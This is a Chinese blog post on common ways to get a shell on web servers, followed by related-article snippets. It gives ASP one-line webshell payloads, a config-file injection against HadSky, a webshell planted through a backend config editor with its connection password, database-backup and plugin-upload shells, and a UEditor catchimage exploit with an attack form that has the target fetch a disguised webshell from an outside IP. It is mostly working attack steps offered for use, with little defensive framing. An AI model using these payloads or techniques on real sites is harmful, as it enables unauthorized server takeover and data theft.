其他常见的getshell方式

最新推荐文章于 2024-05-14 09:17:59 发布
最新推荐文章于 2024-05-14 09:17:59 发布
阅读量3.6k 收藏 3
点赞数 1
分类专栏: getshell 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/123860459
版权

ASP常用的一句话木马:

  1. <%eval request(“hack")%>
  2. <%execute request(“hack")%>
  3. <%execute(request(“hack"))%>
  4. <%ExecuteGlobal request(“hack")%>

一、修改配置文件getshell

HadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装,每一步程序将会引用一些文件进行操作,但是由于install.lock文件的存在我们并不能写入恶意代码到配置文件里,但是此cms安装程序是在case等于4的时候锁定程序,并且是通过GET方式获取的chkcode参数值为”HadSkyInstallComplete”的时候锁定程序的,这和之前写入配置文件的过程是分开的两个数据包,也就是会导致配置文件恶意写入问题

1.首先将upload文件放到网站根目录下。

2.然后进行安装

3.点击下一步即可 ,填写之后开启抓包

4.点击发送,这里只是第三步成功了,还没有完全成功

 5.修改字段,然后点击发送

查看源码发现成功写入,payload:';phpinfo();//   

 想要getshell,将phpinfo();换成一句话木马即可

二、后台编辑getshell

由于网站设计有缺陷,后台编辑网站配置没有过滤并且能直接将编辑内容写入到可执行文件中导致了可以写入木马。

1.登录网站后台管理系统

 2.网站的管理系统的话会存到数据库中

 

3.将一句话木马写入配置文件

payload:"%><%eval request(“hack")%><%'

4.然后使用工具链接即可

http://192.168.44.147:81/Inc/Config.asp,连接密码:hack

三、数据库备份getshell

1.首先打开网站,进入后台

2.制作图片码,上传图片

3.接下来备份数据库getshell,选择数据库备份,输入当前数据库路径与备份后的名字

4.使用菜刀链接即可,注意写入的是asp的一句话木马

 

四、富文本编辑器getshell

常见的编辑器有Ueditor、fckeditor、CKEditor

Ueditor编辑器漏洞

  1. /ueditor/index.html
  2. /ueditor/asp/controller.asp?action=uploadimage
  3. /ueditor/asp/controller.asp?action=uploadfile
  4. /ueditor/net/controller.ashx?action=uploadimage

fckeditor编辑器漏洞

  1. FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)
  2. FCKeditor/editor/filemanager/upload/test.html(2.4.3)
  3. FCKeditor/editor/filemanager/connectors/test.html
  4. FCKeditor/editor/filemanager/connectors/uploadtest.html

ueditor漏洞复现

1.访问漏洞链接查看是否存在漏洞

http://192.168.44.147:82/ueditor/net/controller.ashx?action=catchimage

2.创建攻击表单

<form action="http://192.168.44.147:82/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
 <p>shell addr: <input type="text" name="source[]" /></p>
 <input type="submit" value="Submit" />
</form>

 3.制作图片码

4.把图片码放入到公网IP

5.访问第二步制作好的html文件,提交木马:把http://114.115.164.157:8555/444.png?.aspx,放到输入框中提交,正常页面返回木马路径。

6.使用工具连接木马

五、导入插件getshell

安装环境

进入后台之后上传插件压缩包

连接压缩包即可

 

 

 

 

 

一句话木马
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fckeditor文件上传getshell
千寻的博客
05-17 3313
第二次上传之后是111(1).asp(此时发现已经存在,进行重命名,进行截断)4、更改后缀.asp txt文件,使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt(此时.变成了_)2、发现可以上传一个txt后缀的文件。3、但是无法上传asp的文件。发现存在FCKeditor。1、访问编辑器,进行上传。
ckeditor+ckfinder配置实现图片上传实例
02-01
ckeditor+ckfinder配置实现图片上传实例: 版本ckeditor4.0.1+ckfinder2.3.1,已经去掉授权提示, 需要的可以下下来研究下。
编辑器漏洞解析------笔记
tell_me_404的博客
03-04 3733
用编辑器的好处:比网站自带的上传按钮的安全性高 一、编辑器利用 1、查找编辑器目录(通常在网站根目录、用户目录、管理员目录下) 目录扫描:御剑等 目录遍历 蜘蛛爬行:AWVS、BP、菜刀 常见的目录:   editor、edit、upfile.asp、up.html、upimg.htm   图片上传的目录:admin、editor(根据分析网站的编辑器得出)   eweb的默认路径如下:   u...
2024年物联网嵌入式最全fckeditor编辑器上传漏洞getshell——突破(2),2024年最新贼厉害
最新发布
2401_85014346的博客
05-14 461
第二次 上传logo.asp;x.jpg ==>变成logo.asp;
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3164
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
常见编辑器漏洞利用
qq_40529133的博客
04-24 2336
FCKeditor编辑器漏洞利用; EWEBeditor编辑器漏洞利用; 其他类型编辑器漏洞利用; 如何查看站点的编辑器类型: 前端用户可以利用“目录扫描”,“蜘蛛爬行”来查找编辑器。利用御剑的后台目录扫描可以找到放置在网站根目录下的编辑器名称: 如果编辑器不存在于网站根目录。可以在扫描站点后加上/admin,扫描管理员目录进一步挖掘。 还可以利用Googlehack 查找 比如 inurl:ew...
GetShell的姿势总结1
08-03
GetShell姿势总结1】 在网络安全领域,尤其是渗透测试中,GetShell是指获得目标服务器的控制权限,这通常是通过WebShell实现的。WebShell是一种利用Web服务器漏洞部署的恶意脚本,它允许攻击者通过Web接口与操作...
使用shell调用php脚本
05-03
在Linux环境中,shell是操作系统与用户交互的主要方式之一,它提供了命令行接口,允许用户执行各种操作。PHP是一种广泛使用的服务器端脚本语言,尤其在Web开发领域中扮演着重要角色。当我们需要在Linux服务器上自动...
Shell脚本搭建FTP服务器(vsftpd)
09-15
在这个例子中,脚本使用了bash shell,这是Linux系统中最常见的Shell。脚本的第一行`#!/bin/bash`称为shebang,它告诉系统使用哪个解释器来执行脚本。 脚本的主要任务是安装和配置vsftpd服务。`sudo apt-get -y ...
getIP:获取您当前的公共 IP
06-15
通常,这样的项目会有一个主脚本(如`getIP.sh`),里面包含了上述方法之一,或者可能是结合了多种方式以确保获取到正确的公共IP。如果你解压并运行这个脚本,你应该能获取到你的设备当前连接到互联网时的公共IP地址...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
这里的“更改”可能指的是补丁通过修改ThinkPHP5框架的某些关键函数或逻辑,以防止攻击者成功执行getshell操作。 在压缩包内的文件“thinkphp5远程执行代码漏洞修复补丁”可能是包含了一系列的修复代码、更新的日志...
ckeditor4.1.1
05-10
CKEditor是新一代的FCKeditor,是一个重新开发的版本。CKEditor是全球最优秀的网页在线文字编辑器之一,因其惊人的性能与可扩展性而广泛的被运用于各大网站。
重生之我是赏金猎人-SRC漏洞挖掘(八)-记一次移花接木的GetShell
J0o1ey Blog
02-16 294
记实战中一次移花接木的GetShell
CKEditor 历史漏洞复现:CVE-2014-5191(无Poc)
soldi_er的博客
10-27 6728
文章目录选择测试版本 4.4.2安装 2015 年发布版本 4.4.2npm 安装 - 未成功bower 安装 - 成功页面引用 CKEditor寻找并测试漏洞 选择测试版本 4.4.2 根据官方公告的漏洞修复情况来看,第一个选择最好是 4.4.2。 安装 2015 年发布版本 4.4.2 npm 安装 - 未成功 访问 CKEditor 4 官方指南,查看 [Getting Started]模块。 新建 down-test 目录,测试不同命令的安装结果。 npm 安装命令 执行结果 npm
解决dedecms 5.7文章编辑器附件上传图标不显示,后台编辑器加载缓慢的问题!!
IT技术宅-北方的刀郎
03-21 1176
解决dedecms 5.7文章编辑器附件上传图标不显示发布于:08时04分 | 来源:湛蓝天空  |   编辑:湛蓝  |   日志分类:DEDECMS  |   已聚集:1160人围观问题bug:在dedecms 5.7中发现了一个小bug,在文章编辑器的工具菜单栏的附件上传图标按钮不见了。点击原上传原来的附件上传图标仍然可用(如下图)。http://desdevcms.com/images/a
iis服务器_win2003搭建iis服务器
weixin_39631953的博客
12-01 87
点击添加或删除角色点击下一步点击自定义配置然后直接下一步到底。然后再管理工具里面找到iis服务管理器右键网站然后点击新建点击下一步描述大家可以随便输入,这里是测试我就输入test网站IP地址输入本地的ip地址,主机头因为是本地搭建也可以输入本地ip此处路劲填写你要搭建的web网站文件夹的存放路径勾上前三个勾点击完成这个时候可以看到如下我们可以访问一下网站发现需要密码,因为按照我上述流程安装默认是打...
网站后台getshell的方法总结
anlalu233的博客
03-24 4818
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张...
UEditor上传导致 XSS漏洞复现
afei001
07-16 2525
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS)漏洞。...
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
getshell脚本
09-09
getshell脚本是用于在目标网站上植入恶意代码或命令执行的脚本。通过使用有效的用户名和密码组合,getshell脚本可以自动登录到目标网站的后台,并替换cookies以保持登录状态。一种常见getshell脚本演示了如何使用Perl语言将PHP shell自动植入WordPress网站,示例如下: ```perl %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin ``` 除了通过直接登录后台外,还可以通过其他方式获取webshell。例如,将webshell改为txt文件并上传至目标网站,然后再上传一个脚本文件来包含这个txt文件,可以绕过Web应用程序防火墙(WAF)并获取webshell。 另一种方法是通过SQL语句将shell写入目标网站的数据库中。首先,执行错误的SQL语句,以暴露出网站的根目录,然后将恶意代码写入指定的文件中。一个示例SQL语句如下: ```sql select "<?php phpinfo(); ?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php"; ``` 以上是一些常见的获取webshell的脚本和方法,但请注意这些行为都是非法的,属于网络攻击行为,请勿在未经授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值